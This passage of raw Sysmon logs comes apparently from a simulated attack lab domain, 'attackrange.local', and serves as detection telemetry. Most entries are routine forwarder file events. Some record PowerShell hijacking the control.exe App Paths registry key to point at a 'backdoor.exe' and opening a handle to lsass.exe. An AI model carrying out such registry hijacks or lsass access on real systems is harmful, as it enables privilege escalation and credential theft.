Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDE7F7D9BE8AE740AD664E46BF5780E6,SHA256=4E5D89BDCEF50281B2C95B8512DFAD46C5A2D22B56D9974C9C794F42807694F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.967{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=583C41CF5F4F90FE22C9B204770DFD25,SHA256=D2DF0D165DC3EB5BB078354166F31345715F0220B793FDE3DA69E2DABA6052E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.651{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C48E25A973AF1552D54B61AAC9B0966,SHA256=CAE9C9ACB928036FECF5A32DDD6B956D553CBC77CAC321D32718F365A6AF597D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.651{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEF0F113DFC8A2EA333088ED4F4A62E6,SHA256=3912CD6C6D527E8DFC45AEE1B4CF8A637AA7F67A2359FA5788E65707CF26F469,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:38.651{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5563E9C70ADE9B62823D0F52A1F504E2,SHA256=5A4EBE58B56972E35F396039CF0960F370A2791B99DC5E35ABD8BF161DBD02A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.620{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=28A25DA07F24D31F0A77F57894BB1570,SHA256=648275C9696CE496766197A01CAE5B38E6E3B7F537D2271DFD9D000046DB7272,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001052728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:02:38.420{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe\(Default)c:\temp\test\backdoor.exe 12241200x80000000000000001052727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 08:02:38.303{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe 10341000x80000000000000001052726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:38.134{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.134{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
17141700x80000000000000001052724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:02:38.087{466BC892-F71D-60EB-B97D-00000000CF01}7440\PSHost.132705505575325563.7440.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001052723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.035{466BC892-F71D-60EB-B97D-00000000CF01}7440ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_allbm4ep.feq.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.035{466BC892-F71D-60EB-B97D-00000000CF01}7440ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_q1nvvdql.l3b.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001052721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.019{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_q1nvvdql.l3b.ps12021-07-12 08:02:38.019 23542300x8000000000000000809471Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:39.298{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65CAA434F61A99692651567D8459EF3F,SHA256=003D067270E07BEEE95D9C1699278AAA8BBBE4F4BD8911679E8B9F9762AC1B3C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:31.751{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51174-false10.0.1.12-8000- 23542300x80000000000000001052734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:39.450{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CC0A52E0F90C97A9086F60F8F09962A,SHA256=BEE2EB0EDE5EE1B8B75DE1E1AADA5CC94A630D52C142AE8881147ED5EBF4188A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:40.483{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81A58748D81319EF6E730BC7E638CB3D,SHA256=0161D7F51033F859287DADB0FF4C590C5BF7DFEC8B6BFF4381FE7B49FF251855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809472Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:40.314{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1AE015C15F1D8FD9E06D2CE4B9DBBFD,SHA256=A2245B9EF60C9A4472918E4634029824CE1D3507D0D8C6B6F171B46197E9DC41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:41.506{466BC892-F71D-60EB-B97D-00000000CF01}7440ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:41.485{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE673CF654A98449CF2C97313E418DA9,SHA256=E8C204AC74CD7F226ECC2E4BFA9ADFF8D5A3D7ABB9B88A41086E8391B0961E05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809473Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:41.329{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4357B149ED1CEFA3DA0276A59009C4B5,SHA256=AA98CC589B0F46E147DBF1D3ECB5BAAB28E5E8201D6B6AF5DC2762BCF19E52C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809474Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:42.361{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E8FDF5CCD3B41C2C4F5040BA1B56141,SHA256=52E949262EC6127F8A03F83F0F1FC4661E5B345D1FC3EDBB7CDD0CA0A2255C88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:42.536{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7664D387DD8DC7483C07B4145978A848,SHA256=E710C7C585BEFF72267B995C569AD32380CE32071AC83BA20D6CFBC3C93D23D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:42.505{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=519A85E554F67CF6255F9CC5AB1F9B67,SHA256=5DCE4D898DCDEB4B4E1581AA7E086B4489E87ED5FDDB55E3912459830290A2C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809476Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:42.306{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57398-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809475Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:43.376{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AF7B7891ABCA29CB3755656F560075A,SHA256=9661ADA0EA674E140CB7409F67520D3AC9C08E7E778CA85B645286CEB384A4DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.505{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=097891BA960E956966FB95C41D3C29AF,SHA256=BE5E193F6C7B84F77F2A88E974F1F749006A3C1E675BF44631229772482493A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5821647D4BEAD5A2FA613BB536C63D83,SHA256=39FFFE92ED909906EF6798DD1933740B63514475E452E19EE2167E62BFCAF574,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=ED692BC901218947C7822CDD4F6ED23F,SHA256=47D78BAEACFA46ADCF89CE06FD5766731892132353DE4C15120C9CC909DACFF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:43.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7C4979EB70D0146D690D85CA8F89400D,SHA256=2DDE8CF68EE9F8BE0267CC14EFF18CDFCE6B64E718771290C2A68C75D6AACFAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CCBB3945FF3143B452A2600FEF2CAD03,SHA256=DCBF580A16A17166E37C7BCFFDBF5A67EBDF28B6CDB8C47C9BB8755E79FAA578,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DF6535805AD4BEC90DE8679B8765373F,SHA256=3A568901C983917D3B6E3E7533EB5AE3CC2E54CC0BA96D079CF2B72803F0B649,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9A456E3F9FF18CAC938010FF58DB8317,SHA256=D292780625ED83CA317E20140A78E58F38F3CA23E78B645B2F0CF2F016DFD60F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:43.189{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8E7AD4777A7584EC6AF39E33F6E74310,SHA256=3E7ECDA6672519D5124D07A53AB1D13579A51EA6D5D34730B761FC462A7AA626,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.188{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C086F92976546459F314AE448F2494C0,SHA256=46C1CFE051477FA7B535DF599B6B6E2DFF5F60E5DBE92CB9AF8C2BDD2377C526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.187{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B272BD9FE3B6DF29F24201756F3F61BB,SHA256=AE188D03979F1D6A4BD7E684395AA5CDD9DB9D4E976A347BD040ED1677E48A5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.186{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0B1EDE7997F32A974619DBB9FBD0DD4E,SHA256=6A9E227E0C8989DFFCCDEF45892089A2FD5E354963BEB03ECDFF977DD884CC7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:43.185{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=60EFD701788F3FA7197FB976251936DE,SHA256=71C6668FFB0C615DB6175D58283B960DD75020C71F2113CA87866C2EF3F8606A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:44.521{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49C170A302C642FA09806A0C06B5B562,SHA256=BC782AAF2D19E1246D7893743D61945CFE1AA4BF92C35144F4EEC3E5E3218820,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809477Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:44.392{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92A2675F87B37DC96825A0843956DFF0,SHA256=E02D7591FE9490882C55A52B8F3D7480B92BF15D3B293C39BC87B137C7EEABD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:45.521{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22FAC33FED54E3D084465485F4E53521,SHA256=15A5573275F97833F8080CDD90E1800D4FAC65B13C6F6DF28119BD31BFA59CE6,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809478Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:45.392{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D4673F747DD9E94A079364EDD5CE3E0,SHA256=9EFF5B07B56D4001F2D225F477D38D1B0E909C8782B74B937A2C5FD50A9A794B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.684{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51175-false10.0.1.12-8000- 23542300x80000000000000001052756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:46.536{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59CACB5F555725977DBD37C2DB14C765,SHA256=BC1433FD7BFCA17373DB4580BC7212D74556CABC4A7BB16BE81F43A6400EDBF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809481Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:46.783{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F009743A8F170A2E1BA177C97F4D0D9D,SHA256=009BC9BEB2F4E2EDB73132A1160AB06F88EDD7D9608B341843B7123F0095ADE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809480Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:46.783{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8208B141FD6D5356BA07DEA1782816DC,SHA256=49793826130965B5F2C7C9D1E8B9593D296E4416DA663CE05B7E5BAE2A73ADBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809479Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:46.470{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30EFD1B918F9AF51A1DC14998A368114,SHA256=6178A56EEA5CBB14FB8CC4CAC7B3D46AE5F2CA068C99BF720A66C5CBC995465D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:47.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8DDC9F1DB81B14746E181A1ACB92C5A,SHA256=5E2FD0F3051AD4443A4F01885544B919FB49520E6B94D61A86BB3A94174D6AF9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809484Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:45.925{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57399-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x8000000000000000809483Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:45.602{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
